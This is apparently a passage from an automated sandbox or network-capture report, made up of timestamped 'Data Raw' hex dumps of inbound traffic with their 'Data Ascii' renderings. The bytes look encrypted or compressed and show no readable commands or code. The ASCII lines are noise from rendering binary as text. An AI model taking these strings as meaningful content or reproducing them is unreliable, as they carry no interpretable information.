                                                                                                                                                            2022-09-29 12:45:11 UTC16138INData Raw: 08 38 96 95 ac 54 99 72 37 2f 2b c3 a8 a0 18 1a 57 b8 2c 7e 13 5d c9 87 d9 2e ad 0a 23 c6 65 bd 41 ce 68 28 f3 50 d0 2f ad 7d 9a c0 15 68 b2 5f c6 bf b6 0f ab ff 51 c8 ae 99 eb 33 f9 09 ab 72 d8 53 46 2c 32 64 ea 3d b5 3b b3 37 92 92 3b c9 bc 50 58 99 07 1a d9 6b 47 c1 ca c0 30 cf 1e c0 a0 8e ec bf 6e f7 9b ec 79 6b 7d cf 46 eb cc 18 fd cc 98 74 ac c0 c1 95 7b 79 f2 d8 42 f0 de d5 20 05 be 22 89 f6 99 cc 0c ac d1 ea 52 a8 38 d1 3b 43 36 eb 78 b6 42 0c b8 46 8d ec 66 6f b0 ce 39 53 7b 08 27 93 cc 86 ac b3 ea ef b3 46 b8 99 1e 76 36 59 ff d2 da 6b 47 a4 28 f2 6d 2b e6 fb 84 3a ac 3b 98 5e 5f 69 e5 cf 1b ca 10 fc e2 bf 1c 4f 52 74 d5 6b 6c db b6 8e 91 2c c9 a8 e6 e6 0f f1 4f a7 68 6f f4 f4 46 53 a5 7b 2b f1 9d 28 4f a5 b1 ff 31 0d a9 17 87 ed ba 53 b9 90 19
                                                                                                                                                            Data Ascii: 8Tr7/+W,~].#eAh(P/}h_Q3rSF,2d=;7;PXkG0nyk}Ft{yB "R8;C6xBFfo9S{'Fv6YkG(m+:;^_iORtkl,OhoFS{+(O1S
                                                                                                                                                            2022-09-29 12:45:11 UTC16154INData Raw: cb ae 93 bf 61 5f 0b 32 04 ce 18 1d ad 36 8b ae a9 cb 81 b7 c6 15 19 99 81 9c 6b 88 e2 33 0c 67 4b 94 b9 7f 53 07 d4 a5 4d 26 1d e1 51 3d 0d 41 d9 68 8f 4a b6 cc 15 b9 60 9b b5 f4 b4 51 87 9e 5c fc a2 0c 39 b1 29 4b 00 cf 77 ea 39 ae 92 86 82 dc 6e a8 ad db d2 4c 02 54 34 e7 da a6 1e 12 76 0c b8 27 5a 27 d4 bc 6c 85 e5 20 f5 1d bc 16 86 63 7c c0 68 4a 20 05 31 d6 92 05 d2 86 98 da 32 20 81 19 38 e7 e6 a0 c9 ed c9 de 29 73 19 74 24 66 68 23 61 7b f2 d1 c6 2d bc b7 29 4e 29 70 70 ff 54 89 22 d2 7d 25 db 50 d3 e6 02 2e bd a3 8c 36 04 42 0f 5f cb 93 9b 5e e8 0f e3 bd 19 64 ef 83 f4 d9 fa b8 75 30 3b 10 de 23 45 8b 8e a6 be 56 b2 27 c4 3b 25 29 6c 43 58 26 da 95 f1 14 e8 df 12 88 13 5c 12 5a 5b 42 78 87 ab 45 59 e4 3e 40 6d f1 86 15 c5 b2 1e a3 80 0d a0 9b f5
                                                                                                                                                            Data Ascii: a_26k3gKSM&Q=AhJ`Q\9)Kw9nLT4v'Z'l c|hJ 12 8)st$fh#a{-)N)ppT"}%P.6B_^du0;#EV';%)lCX&\Z[BxEY>@m
                                                                                                                                                            2022-09-29 12:45:11 UTC16170INData Raw: c1 c5 db 4a cc 52 8a 74 38 c1 5f 48 2b 28 8a 34 40 f5 d9 d8 6a 63 c9 4b f6 47 78 1d ed 91 88 fd 19 25 04 09 30 eb a5 37 a9 5a 62 8a c3 ba 05 24 45 b1 50 a5 db 1b 6b c4 93 1d 0d b9 18 f8 7a 46 88 10 fb 21 cd ef e0 ec fe 18 58 3a 7a a3 17 67 f0 87 c6 82 32 2a d5 6f 90 e7 05 12 2b 32 c4 51 a4 c8 70 2f 24 d8 cf 94 07 1b e0 04 f5 bc 85 b0 dd 11 ac 3c b6 8c 37 e6 b3 26 83 e7 93 6c 39 14 6a 08 db 37 c6 f3 cd 37 88 09 42 ba d1 6f e4 d0 3b a9 10 2a 12 6e 97 09 d1 8f 73 c3 5a 1c d0 87 dd e8 55 6a 6e 76 31 86 2f fb 6d 77 4d f2 70 4e 42 5d a8 bf 6f a1 54 19 68 40 ae 54 ca 9d 96 cd f2 e8 ce 26 16 31 dd 89 aa c5 0b fe b6 52 0b 89 f5 74 d4 19 0e 0a 84 9f b3 64 22 05 80 7d b3 d2 71 13 77 17 89 92 ad 95 aa 0f b3 96 cf 16 81 de 00 db db 99 ad 0b 05 97 d1 61 c5 f1 49 31 2f
                                                                                                                                                            Data Ascii: JRt8_H+(4@jcKGx%07Zb$EPkzF!X:zg2*o+2Qp/$<7&l9j77Bo;*nsZUjnv1/mwMpNB]oTh@T&1Rtd"}qwaI1/
                                                                                                                                                            2022-09-29 12:45:11 UTC16186INData Raw: de 0c 7a dd 7f d8 59 44 d9 cb 5d 44 33 e7 27 4b db ab 34 fc 24 65 a6 9b 44 0e 8f 0d 86 a4 fe e0 4b ba 11 7e fa cd e4 31 f6 4e 96 af 6f 0d af 83 f6 53 31 5a f6 13 d5 24 c9 a3 5e 86 53 f2 68 4f 72 ab 46 c4 be 08 ee 4f fe 2b 88 92 3a 36 f5 4b a8 f7 19 90 2e f6 f3 15 a3 c9 90 75 0b 6c ee f6 cf 55 32 78 73 f8 e6 0f 53 fb b2 f7 74 6c 9c 46 7e 92 7b 2c 1a df 7e 06 c2 e3 58 3e 28 ae d9 40 4e 07 a2 67 a5 ca 62 f1 54 4e 79 12 b9 4e ff a3 8b 4d 8a d3 bb 56 0f ba 8f 0c f8 2e 95 0b 2c 2d db 0b 8f 11 9d 88 fa ac 2f 3c ba 28 ea 5c a2 6f ee 55 a8 fe 11 07 71 67 56 03 7f 7f e7 cc 6f 3a 6c 19 ef 64 fb 52 02 43 3d f3 f7 07 2c 40 18 04 f8 9c 8f 2a 14 9a d1 b5 62 d0 67 cf 71 b1 d2 22 a8 4f b6 30 1b e2 97 ab 5e b4 af 21 02 ab de dd 1a 42 c4 fe 19 b9 58 9c 44 a2 d5 16 f8 f6 c1
                                                                                                                                                            Data Ascii: zYD]D3'K4$eDK~1NoS1Z$^ShOrFO+:6K.ulU2xsStlF~{,~X>(@NgbTNyNMV.,-/<(\oUqgVo:ldRC=,@*bgq"O0^!BXD
                                                                                                                                                            2022-09-29 12:45:11 UTC16202INData Raw: fa f3 24 c5 13 e6 a0 fc 7d 60 72 f5 59 49 57 94 a6 8c 7a 76 8b 11 ed fd be c8 f3 dd 4d 4e 50 ec 6f c1 ee c7 12 08 ff 18 cc d8 1c 69 7d d6 ed ef 96 34 f8 bd 67 8d 9a bc 9c 06 36 be b9 72 35 75 3a 98 48 5a e4 29 e7 64 15 2c c8 33 70 fb a7 e7 3b ab 3f 29 a4 dd 7d 90 b1 63 cd eb 26 70 72 d1 f6 e1 37 c6 c3 59 a9 33 22 64 6d 05 8e 80 f6 42 e1 75 94 d2 a7 69 a5 c1 d4 2e 34 8c 6c 20 c9 5a bc 3d fe 15 a7 74 3a a2 b4 c6 fa 22 8f 7f 2d d5 d0 c1 9e eb f3 7b c0 c2 d3 f4 2a 2c d9 c3 cd e4 f8 bf bf 72 a1 db 15 08 4f b7 6d e3 10 43 09 70 5d 77 6c a3 66 a3 35 26 e1 0f 00 b2 34 e2 0c 93 32 ad 26 3f 2a 1c 0e c5 18 b1 53 93 9c 73 cc c3 dd f4 f5 5a 7f 52 e7 41 32 63 16 c6 4b 68 47 22 b2 54 87 f9 db a0 25 af 79 c7 44 83 30 b3 05 f8 5b 5d f4 38 1e f7 28 be 9b ca 3a 2a c9 f3 a5
                                                                                                                                                            Data Ascii: $}`rYIWzvMNPoi}4g6r5u:HZ)d,3p;?)}c&pr7Y3"dmBui.4l Z=t:"-{*,rOmCp]wlf5&42&?*SsZRA2cKhG"T%yD0[]8(:*
                                                                                                                                                            2022-09-29 12:45:11 UTC16218INData Raw: 3d f6 6d d8 1d 0a 3e 59 aa 33 dd 3e c2 f9 7e c2 4d 98 c3 c2 09 44 99 bf 5f f2 7a b5 a8 0e fd 0e 68 a7 d0 1e 4d ed ea 0e f0 b9 77 b1 bd 5c 59 cf 6f 4f 7b 40 04 2c 1d 40 fc e0 28 0e 0a 4e 93 96 d5 40 ff 98 3c 1b 10 1d 56 c5 ed 94 30 3b 39 69 a5 96 1a 20 48 0c 42 ec 52 f1 5c 4f c9 0c df de 2b 72 8c a7 19 da b1 91 75 d7 3e 30 4e a5 40 b9 8e 7a cf eb a0 ef 22 99 e9 93 ed 36 42 55 62 6c ca 40 c7 8a c8 30 3c 87 1f 47 26 6b 5f 01 8c db cd 4c ca c6 e9 96 95 22 c8 cf e9 18 ff d7 4a a2 a0 81 26 eb d4 07 86 df 0e 0c e6 6f ba e8 2d c5 1d c4 4d 0c 3a 07 dd 28 07 12 b9 3e 97 c9 f2 ff cb d2 4a 9b 56 d5 c5 a0 d1 51 8b 26 ba 64 78 61 9d d3 d4 4e 7b ea 62 ec de b6 13 0a d8 2e c7 9d d9 ae fc 64 d2 ff 72 04 71 c5 78 20 fa 1f fb e7 74 fe 4a 7c 13 0b 8d ea 31 ab 50 36 46 a6 a6
                                                                                                                                                            Data Ascii: =m>Y3>~MD_zhMw\YoO{@,@(N@<V0;9i HBR\O+ru>0N@z"6BUbl@0<G&k_L"J&o-M:(>JVQ&dxaN{b.drqx tJ|1P6F
                                                                                                                                                            2022-09-29 12:45:11 UTC16234INData Raw: 83 6a 69 e6 85 08 0d 1d 32 9d ea 65 89 90 a3 1c 44 3b 9a 89 e5 8d b4 fa f7 d0 a8 2c 5f d8 e3 9e a2 c3 aa 72 3e 8b fe 39 60 9e 9b 00 90 fe 4c 03 db ed f2 d6 a8 46 32 42 96 6d d7 81 75 c6 bb 35 6e 5f a0 f3 7b b1 e3 38 41 50 fc d6 c4 48 bd 04 27 67 8e 04 f3 2b b0 3d 94 e8 fc ed 2a 3f fc 0a 59 b3 41 8d 35 3d a0 4a 08 78 a5 84 b4 b6 1d 48 03 7d c9 91 b5 94 43 ad 92 55 6e c5 88 31 ee d3 89 bd 7f 95 b9 03 41 17 3a 94 ef 4f 5e 7c d1 ec 83 51 bd 44 30 71 99 3a 6b 18 9d fd 84 76 5b 0a 91 aa 91 89 24 52 5c 8e 36 b1 4b 74 ae d4 ab 9a 57 b7 b0 09 81 5c 38 5e 5a 5e 96 97 7d 2f 23 cf 59 0e d3 2a 42 76 2d 72 0e 33 a2 5e f7 8c 9e 03 61 10 b3 1f 14 a6 9d a0 e3 c5 b5 23 b3 6c d1 4f d8 7c 35 7f 70 a6 3a 5b 75 08 84 8b bb e2 20 bc 95 03 56 cd 47 29 68 18 8c 53 23 1e 15 fb 8b
                                                                                                                                                            Data Ascii: ji2eD;,_r>9`LF2Bmu5n_{8APH'g+=*?YA5=JxH}CUn1A:O^|QD0q:kv[$R\6KtW\8^Z^}/#Y*Bv-r3^a#lO|5p:[u VG)hS#
                                                                                                                                                            2022-09-29 12:45:11 UTC16250INData Raw: 41 f9 92 c8 cf 5e 41 b2 00 52 f2 b6 41 18 70 48 1d 70 80 6d 70 e5 b2 94 eb f2 1c e6 ca 2f 6a f8 25 57 f2 64 8e c3 f8 1e 11 0c bd 84 b2 1d 07 f6 aa 89 d0 d7 ed 49 ee 44 e1 76 d7 04 83 46 35 e3 c8 bc 01 12 0c c8 3f 6a 2e cb 77 7a cd c8 d8 eb cd 2b d6 a8 6d a9 af 94 83 30 87 9c df 67 7b a1 15 89 49 19 31 6a 6f 7d 19 a1 48 cd 57 51 2b be 31 76 b4 77 14 7d 4d cc be ac 4a 38 2f 02 6d 41 aa b0 20 82 e6 fa d4 00 d2 4f 78 fb a7 5d e7 f7 9d f3 fa 42 3a c7 38 d9 a7 4d b8 5c 9f c6 bd f8 ed c1 09 e7 f0 90 d9 4f cc 5b 20 8d ef 6c cf a9 34 37 ff 09 88 40 79 c2 2b 5b 53 ec ab e5 c9 6e c4 09 d5 ea c5 4c 69 14 83 de fa 24 7d 39 50 fd 26 90 7e 44 64 a7 10 3c d0 7e 17 6d 0f a1 7e 61 f6 d7 f9 68 06 d3 93 6b a9 0a 64 06 01 e3 02 19 5f 2a f8 b7 f6 1f f8 21 68 88 9f c7 ca 8e a0
                                                                                                                                                            Data Ascii: A^ARApHpmp/j%WdIDvF5?j.wz+m0g{I1jo}HWQ+1vw}MJ8/mA Ox]B:8M\O[ l47@y+[SnLi$}9P&~Dd<~m~ahkd_*!h
                                                                                                                                                            2022-09-29 12:45:11 UTC16266INData Raw: ae 38 c4 50 f1 fb a3 a4 f0 38 b0 17 b8 89 8d 9a 00 8b 73 99 34 4e 8b c1 4c 4a f0 15 e6 84 6f 17 bc 71 3b 7f 0d 2e be 20 ef a7 6e 7b 3e d5 64 19 f9 65 2b 15 82 c4 c4 98 4d 8a 47 e3 d2 e3 73 14 f6 17 c9 dd fd 65 87 44 eb c2 b1 7c a6 1d 16 a9 2f 32 27 58 41 bf be e0 97 06 75 4d 38 d2 f4 e4 9d 0c 10 7f d7 da 45 9a 6f ce 1a 41 b2 97 5a bc 9e c5 35 e1 63 d9 c0 b3 32 ae a9 a2 bd 5a ce 07 70 d4 e0 1f a8 d3 2e 34 d3 b3 05 19 4e 36 c2 64 41 8d 1e c4 d8 43 b0 4f 75 f5 7d f8 b7 bb 0c 7f b9 24 e2 d9 82 f0 5e 28 c9 90 5c 68 48 e3 28 79 a1 36 97 cf d6 d2 b7 35 a0 5e d8 5e 3a 82 c3 de 02 06 93 67 36 0f d5 ae a1 de 69 15 d1 25 70 0d e0 dc 40 aa d0 cd bb 9b 45 6c ba b1 7c c9 98 ee 03 93 e0 9c 39 f6 6a 5b 55 53 45 68 3b c5 39 a6 49 50 db ef f2 d7 2a 8f b7 1c d1 24 ae cb 82
                                                                                                                                                            Data Ascii: 8P8s4NLJoq;. n{>de+MGseD|/2'XAuM8EoAZ5c2Zp.4N6dACOu}$^(\hH(y65^^:g6i%p@El|9j[USEh;9IP*$
                                                                                                                                                            2022-09-29 12:45:11 UTC16282INData Raw: 64 14 67 7f bc 3e b1 c2 da ee d7 79 77 48 d9 82 08 16 ea a0 28 df c2 fd cd 5b e7 59 9d 31 14 2e 1f 53 e8 84 d8 8a 06 d5 e2 32 17 53 8e 6a 98 ea 93 98 b0 0c 3b f6 75 05 36 d6 02 34 f1 18 6c 8c 60 fc 2a 86 73 ec a6 4a 85 19 30 46 52 54 a6 d0 19 3e 65 94 f2 ea c7 b3 83 53 b2 ba 94 4c 87 e4 bb 1a 56 f5 b1 0e 36 e3 50 0e df 4b be bf 58 91 27 d3 b6 c8 e1 37 9a ff fc 1e 00 65 94 50 e8 a7 e1 aa d2 df f1 6c 63 46 fa 4f c2 dd b0 25 8b 49 6d 61 f3 89 a4 c8 ca 42 7b 94 90 cd 2e c2 df 34 d9 06 8e c0 48 f0 9f 87 76 f5 14 a5 c4 3c b7 35 1c 26 6d 92 06 d6 c9 6b a7 eb d3 a3 2f 00 95 d6 61 fd f1 6e b6 24 61 92 6f b6 78 2e 75 46 6b b6 ca f1 31 a7 75 2a f0 ed 8a 51 f6 cb 1b ae 3a af bf 75 0f 2b 9f ac f9 ad 38 67 13 f4 c2 02 2a 6f 1c 77 ae 1a b8 0b fb 6f d0 5d e4 ac 09 1e aa
                                                                                                                                                            Data Ascii: dg>ywH([Y1.S2Sj;u64l`*sJ0FRT>eSLV6PKX'7ePlcFO%ImaB{.4Hv<5&mk/an$aox.uFk1u*Q:u+8g*owo]
                                                                                                                                                            2022-09-29 12:45:11 UTC16298INData Raw: ae d6 6b b4 01 02 ed e3 b6 e4 a3 fd ea dd 4d b0 6d 71 a8 00 7a e5 1c 84 6d cd b4 81 9a fd 0a 0a 29 1b e3 f5 f2 ef 42 04 71 ae 36 61 91 3b 5d 53 a1 f1 12 12 29 b8 4d 5f 0a 83 cc e0 65 94 16 fe 05 2f ef a4 44 c6 ba 82 52 e8 f7 21 4b db bf 7b f9 8b 25 b6 7d 62 a6 a5 61 e1 5d 29 c9 25 0b c6 94 1a 23 0d 33 26 30 f5 23 8f 16 6d 4a 3d 46 12 56 84 6d 29 8a 76 f9 c1 b5 ea c8 db 23 67 f1 3f d3 ed b5 93 1a ca 5c 60 e2 47 3b 68 4e e4 06 ff db 6f cb 4c 8d 1b db bb 0b ac 97 59 31 c6 fa 9f 74 8c 47 98 be 14 4a 77 31 c3 37 69 f4 82 c7 6d 62 4d 26 97 14 f5 80 33 24 1f cf 08 ef 8e 58 a3 9b 11 a0 60 46 59 e2 48 f1 3a 79 ca 4a b6 5b 5e c6 d7 1c d5 a7 4a 08 cd 20 e2 55 06 7f fa 4e 63 7a 54 79 6c 44 cb 34 bd 8d 62 68 7a 12 b9 85 de 4c 51 ec c4 5d eb ac 15 0b 25 3e 61 3a 8f a0
                                                                                                                                                            Data Ascii: kMmqzm)Bq6a;]S)M_e/DR!K{%}ba])%#3&0#mJ=FVm)v#g?\`G;hNoLY1tGJw17imbM&3$X`FYH:yJ[^J UNczTylD4bhzLQ]%>a:
                                                                                                                                                            2022-09-29 12:45:11 UTC16314INData Raw: c0 b1 e7 51 8c fb d3 30 6f 4f 6b 08 45 4d 89 74 4d a7 73 8b 0b 3c b7 87 19 24 3c d4 1d f7 16 22 68 3b bb 2b dc 9e eb 42 f5 e0 e2 4d 6b 99 95 65 6e 63 e5 d4 e0 c9 3f b1 56 a3 67 4c dc d3 76 27 37 18 5c ac 7f 89 c5 01 a8 61 31 9d 8e 48 4e c9 54 74 fd 2c 52 66 44 e7 fe 18 9d de da f6 e8 05 56 b3 f0 2d 74 30 57 f2 68 74 62 cf 4a cb b6 c5 db b9 8b ad 5e 00 72 05 59 3f 94 bd c1 8f 48 97 eb 3a 39 99 77 71 80 09 5d 32 91 af 21 87 6a 39 36 46 98 d8 38 1f b7 56 ae 95 55 1b c5 8c 9c ea 0f 29 c2 bc a7 49 bc e0 d4 bf d5 bd 99 6b 66 d1 c9 75 c2 71 19 60 3b 24 1d b1 35 08 22 06 b4 47 43 1e cd 39 8b 08 45 8f 41 0a 4c ac 46 98 b1 c4 6d 24 06 9e 6f 46 f5 3c a1 4c 77 9c 68 4c 2c 79 ff 5b e1 5d 9d da 5f b3 4e 6b 1e c3 88 ed d7 bc 8e 98 bf 8e c9 68 a5 36 1c ac 2c ab 34 02 5b
                                                                                                                                                            Data Ascii: Q0oOkEMtMs<$<"h;+BMkenc?VgLv'7\a1HNTt,RfDV-t0WhtbJ^rY?H:9wq]2!j96F8VU)Ikfuq`;$5"GC9EALFm$oF<LwhL,y[]_Nkh6,4[
                                                                                                                                                            2022-09-29 12:45:11 UTC16330INData Raw: ea 25 bc 82 82 1b 44 d6 a5 78 37 8d 60 2b 80 f3 b6 a6 76 81 51 02 90 32 72 97 23 1e 2a 8b 0f 4f 15 e4 87 f3 f3 f1 99 2a f9 8b 8d 42 28 0f b3 f5 ea 1a df a9 b6 ea 80 bc 20 77 3a 12 2b 58 76 e7 13 7c 0b 31 44 ea 8d 9c a7 8a f2 13 7c aa 10 97 fd 1f 9f 72 be 03 e0 2d 32 2d ae e6 45 a3 ee 34 be b2 90 25 da d8 80 a4 cd cf 08 09 8f 05 6e 10 53 02 15 56 a9 a9 67 71 db 02 cb 01 f2 ca 9f 14 6b 5b 1d 6b 5c b8 27 8f 6d 34 0c 28 d0 2f 8b 03 97 e8 9f 00 c9 6c 58 10 49 0d fc 35 6e 74 2c a4 a0 07 4f 04 26 bb d2 ce c6 22 32 bf 49 ea 3f 6d 56 42 96 6c 9c 9c 4b 57 dc 5c bf 79 ed 69 e6 76 0e 1a 2e 71 38 a0 25 66 fc 49 1b 06 c1 7b 73 a6 dc 0d 5d 78 22 ef 6b 6e ad 84 0d 5c da b2 df db 05 e2 84 83 4d 25 4e fd 63 f6 7f 2a 0b e1 2b 5d d2 01 de a0 2d 89 c7 99 6e 23 9a 74 1f f4 e3
                                                                                                                                                            Data Ascii: %Dx7`+vQ2r#*O*B( w:+Xv|1D|r-2-E4%nSVgqk[k\'m4(/lXI5nt,O&"2I?mVBlKW\yiv.q8%fI{s]x"kn\M%Nc*+]-n#t
                                                                                                                                                            2022-09-29 12:45:11 UTC16346INData Raw: b8 f2 90 a7 79 7c fc 5b 8f c5 b4 68 ab a9 c4 fb df 5b 0a b6 f5 fa 7b 72 18 7e 7e af 0c 09 29 4a a4 43 33 b9 d0 fa 1a 13 76 9f 8c fd 42 ba 90 de dc 62 91 eb a2 57 dc d0 64 34 63 17 70 23 34 79 2c 55 71 89 ab 48 24 7b 6e 47 1b 60 dc 84 f7 d8 ec 1d b3 43 42 32 39 8d f5 dd 23 5c 0a 58 b9 0c 74 91 c8 d9 9c bd 67 fd 68 2a 7b 63 94 05 c1 19 23 fd c0 12 8b ae ac 30 f1 5e 98 f9 7c 03 3a 54 c7 bf c0 50 9c ed 86 1d f8 7e 94 9a 1b 1b be f6 0e 90 94 a2 ce be 85 f0 8b 3f 8b 75 6a 21 4a 3e cf 96 8d 33 5d 15 73 19 dd 5f dc e6 e8 27 88 86 1b 3c 38 0c de fc 9b 6b 28 b8 ff 73 d2 e0 4f f7 5f c7 c4 13 5e 1f 7f d5 a4 9e f1 5c f3 5d f7 8d 9d aa d7 1b 47 b5 25 50 69 8e f4 e4 17 5a c4 82 7a 33 14 a2 e0 31 23 eb 1c 6b 45 00 72 f1 96 0b 1a 56 d0 47 e4 11 33 00 be 0f 43 de 1e ce 1a
                                                                                                                                                            Data Ascii: y|[h[{r~~)JC3vBbWd4cp#4y,UqH${nG`CB29#\Xtgh*{c#0^|:TP~?uj!J>3]s_'<8k(sO_^\]G%PiZz31#kErVG3C
                                                                                                                                                            2022-09-29 12:45:12 UTC16362INData Raw: 9f f6 48 f6 70 76 f2 2a 6f cd 79 db 77 9c e3 fe cf 68 73 44 ed 97 6a aa 78 07 83 25 b4 0a e6 c2 06 d0 be 8e 66 74 0d c6 f9 c0 28 89 80 7c 91 a6 a3 60 7c 0b e7 5e 15 23 f2 0d b6 4b 85 1a 68 11 4e e4 09 b7 ba 8a 13 93 7a f7 20 ba bf 04 3c 8a f3 cd 0b 8d 9b c5 8b 37 19 96 c8 c0 20 b6 69 7a a9 99 ea 30 d1 b2 fe d2 3e 45 07 d1 e0 d2 b3 3c e9 77 9f bf c9 31 ec 79 2c 9b 49 af 8a cf 4e 97 64 63 5d 9d 43 51 ff 91 73 32 ec f6 78 69 59 4b e5 8f fb 61 21 c7 29 1d dc 91 ae ac 50 a4 19 fd 7b d7 f3 43 a1 98 a0 34 35 87 92 03 1e 61 fb 9b d4 88 34 e5 3f c9 4d f2 fc a8 d5 4b e9 b0 fe 43 45 fd c4 78 24 4d aa 38 4e b1 fd 15 bc 69 c9 04 7e c3 4b 57 1b 89 ea 6c 26 48 fe f9 40 e7 c5 7f 3f 3e cf 5a 43 d0 a3 c3 ad 71 24 18 8c 01 f6 39 55 3a 0c 44 64 c1 3a 84 8b 22 60 9b 84 bf 9c
                                                                                                                                                            Data Ascii: Hpv*oywhsDjx%ft(|`|^#KhNz <7 iz0>E<w1y,INdc]CQs2xiYKa!)P{C45a4?MKCEx$M8Ni~KWl&H@?>ZCq$9U:Dd:"`
                                                                                                                                                            2022-09-29 12:45:12 UTC16378INData Raw: a6 18 d7 d9 27 0b c2 e8 52 23 9a 91 29 40 33 8e 27 78 e4 dd 60 c0 97 68 ff b0 33 91 41 69 b1 d4 ae 0d ff b8 bd e4 95 63 55 e3 19 26 b4 d0 71 cf b2 6a 01 a1 e7 f8 6b ec 11 d1 7a df d1 bb 40 57 cc dc 0e 80 36 6d dc 19 64 f6 52 12 ca 17 1c c4 59 b7 4f 30 3f 48 e1 da fa 91 75 da e8 45 5b 07 92 dd 10 bd 8c 65 ce 08 a0 d9 87 4c b0 0c f5 db 66 bd 88 35 d2 31 3e 1e 33 ed 29 3e ff 16 73 bb b1 c8 1a 29 7c 3b 4d 67 b1 b8 60 f8 c7 ac 76 d1 94 26 fd e7 d0 fb 4c 64 9b ad 93 9d ac 55 8b 20 f4 3d fa 28 3e 18 cc d5 d9 49 73 5f 77 d4 ee b4 80 5a ae 19 6c 0a 2f c0 81 26 53 65 f0 af 91 53 ef 8b f4 b7 4a f2 2b d4 1f 52 90 52 cb 7a 60 4b d6 7b d2 34 a4 61 15 e8 c3 a8 3d f6 8a bf 3a 0c b8 5d f8 91 9b 8a 28 62 2d 10 06 9a 38 6e d6 7a 2f e4 17 53 8f 20 8d d7 89 5d ea b6 78 8a 56
                                                                                                                                                            Data Ascii: 'R#)@3'x`h3AicU&qjkz@W6mdRYO0?HuE[eLf51>3)>s)|;Mg`v&LdU =(>Is_wZl/&SeSJ+RRz`K{4a=:](b-8nz/S ]xV
                                                                                                                                                            2022-09-29 12:45:12 UTC16394INData Raw: 3f 66 32 61 14 6c 21 a6 0c 35 73 2e 5f cd c9 a8 ff 08 98 eb 47 fe 34 fd 08 95 d5 75 6b 73 a4 9f f8 78 b9 e4 95 b2 87 ab af 5c ec e8 10 45 d9 37 a7 ad 20 74 69 15 c2 9e 59 f5 d0 82 ef b6 a5 9d 82 4d 13 b4 6c 0c fa 59 06 09 ec 56 19 6f 28 2f be 8f b1 49 15 b2 f2 b4 a6 98 3b fe a1 81 8e 51 63 af d9 99 57 65 05 cd 80 fe 96 c3 0e 4c b3 04 88 21 08 0b d2 5b de f4 39 c0 45 86 c4 14 ec 03 4a 15 b4 cf 36 65 12 fc 9d e3 e2 8b 62 84 e1 4a 63 81 3c 29 dc 84 03 55 89 ee e9 9b e9 14 be 73 f1 70 69 07 48 94 b1 69 7a 70 c7 83 3d 0f cc d8 87 af 08 12 e6 98 b0 6d d3 3b 7f fe 8c 2a bd 97 6a 71 fb 90 e6 78 4b f9 d5 73 55 01 9d 93 17 b8 b9 24 f4 fa 77 0d bd 26 cf 99 60 5c 43 5f 15 93 a9 77 24 e6 5d 91 8b b4 55 39 c2 99 34 78 58 31 4e 38 9e c8 f4 54 93 c2 75 07 d8 28 9c a9 8c
                                                                                                                                                            Data Ascii: ?f2al!5s._G4uksx\E7 tiYMlYVo(/I;QcWeL![9EJ6ebJc<)UspiHizp=m;*jqxKsU$w&`\C_w$]U94xX1N8Tu(
                                                                                                                                                            2022-09-29 12:45:12 UTC16410INData Raw: c9 cf ff ad e6 27 99 2c 6a 0d af 97 2b 31 78 e7 c6 be 24 f0 2f 36 a7 30 17 97 77 06 83 c4 64 87 29 05 b7 64 48 1d 33 2c b6 fe 70 b2 0d 38 a6 e4 2a 15 3c 8a a8 16 10 41 9f 50 68 4e 3a 0e cc 78 a1 98 e6 86 e7 fc c3 e0 7e fd 56 a4 42 d2 86 4a 47 6f 9b 3e b7 c5 fc b3 a3 15 8b a3 f4 3e 72 a2 b8 2b 00 2d 30 93 a6 b2 63 dc 0e 38 60 d1 cf eb 1b 66 95 7e cb 30 7c ad 89 29 62 80 e1 46 3c 5d 50 3d f2 fc 82 7d da c6 35 38 25 d0 6b ab fe 3d f5 6d ca 57 39 76 56 a1 d7 3f fa 05 d0 b8 f6 5e 33 c8 3a db 42 40 57 d9 63 d3 88 8e 16 51 21 fa 75 e8 e7 17 f8 b3 39 2e 8d 41 62 65 24 74 11 db 6c 33 39 8e c5 82 29 d8 5a 0f 81 eb 71 36 3e 45 2b a3 21 bb a6 6a 90 2f df 04 b7 2c 27 1a 23 ea 78 c2 8c ef 14 06 12 bb f9 93 8d 1f 9a 11 8a 2c 4c f9 91 da 34 b7 b9 31 ac 38 5a 3c 2b 8c 27
                                                                                                                                                            Data Ascii: ',j+1x$/60wd)dH3,p8*<APhN:x~VBJGo>>r+-0c8`f~0|)bF<]P=}58%k=mW9vV?^3:B@WcQ!u9.Abe$tl39)Zq6>E+!j/,'#x,L418Z<+'
                                                                                                                                                            2022-09-29 12:45:12 UTC16426INData Raw: c2 72 4c eb 86 69 ef 2a fa c7 34 b1 f5 35 a7 1d 4c b2 38 40 43 17 e5 1b fc 77 60 40 d4 e5 ca e6 e7 e7 43 9a 28 06 d1 78 54 d1 dc 81 f6 76 c7 61 5c 04 ac f0 d9 0f 9d b8 34 c3 5d 30 df 72 02 06 d0 11 c1 36 d9 00 f6 11 bb 9a f4 72 28 37 40 b8 74 d1 7a 3d 66 9c a9 23 0a 45 b7 dd 93 87 1f e9 22 c8 32 89 f1 97 91 82 2f 36 bb 3a 9d 8a e1 10 d0 70 61 cd 60 51 a5 b4 d3 c3 e6 83 b4 94 5a 2a a6 d7 b9 e0 5d 86 5d 6e 0e fd f0 ca d9 bd 8c 49 01 1b 7d 58 2e da da 0f 9a 19 84 7d a2 93 f7 85 56 7e 26 0d e7 61 ef fc 39 2a 86 8f ff fd ed 42 71 8e 99 0a df db dc da 80 06 26 41 f0 d2 95 58 54 03 17 05 96 06 c6 c8 1d 11 d6 41 b5 96 25 6a 00 fc f5 64 26 7d e8 82 52 b3 77 5c 34 3f 4c a8 5f 6f fb d7 9f 37 65 97 b4 3b 80 30 0b 50 ca 35 c3 d7 3a 04 f9 9e 46 96 71 ff f3 e2 38 57 6a
                                                                                                                                                            Data Ascii: rLi*45L8@Cw`@C(xTva\4]0r6r(7@tz=f#E"2/6:pa`QZ*]]nI}X.}V~&a9*Bq&AXTA%jd&}Rw\4?L_o7e;0P5:Fq8Wj
